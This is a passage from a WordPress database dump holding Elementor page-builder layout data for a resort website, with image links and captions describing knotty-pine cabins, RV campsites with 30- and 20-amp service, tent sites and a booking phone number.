unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2211,794,'_elementor_edit_mode','builder'),(2212,794,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4b673a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"308656e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6f9d682\"}]},\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2ee48a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6709678\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0fa9e68\"}]},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fa609b1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fd18586\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a2a06f4\"}]},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"20e278f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0ca8b08\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ef5ef18\"}]},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"adba769\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b9b611f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"12f18e0\"}]},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"983db86\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"44b3df9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"31b947d\"}]},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9ff9492\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3d31bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c5a0aac\"}]},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f0cb2f5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a81b13f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a0bfc5f\"}]},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5fd4daa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"40c1597\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd844e\"}]},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dda391e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c0140ee\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ca1a73a\"}]},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"741a9c4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":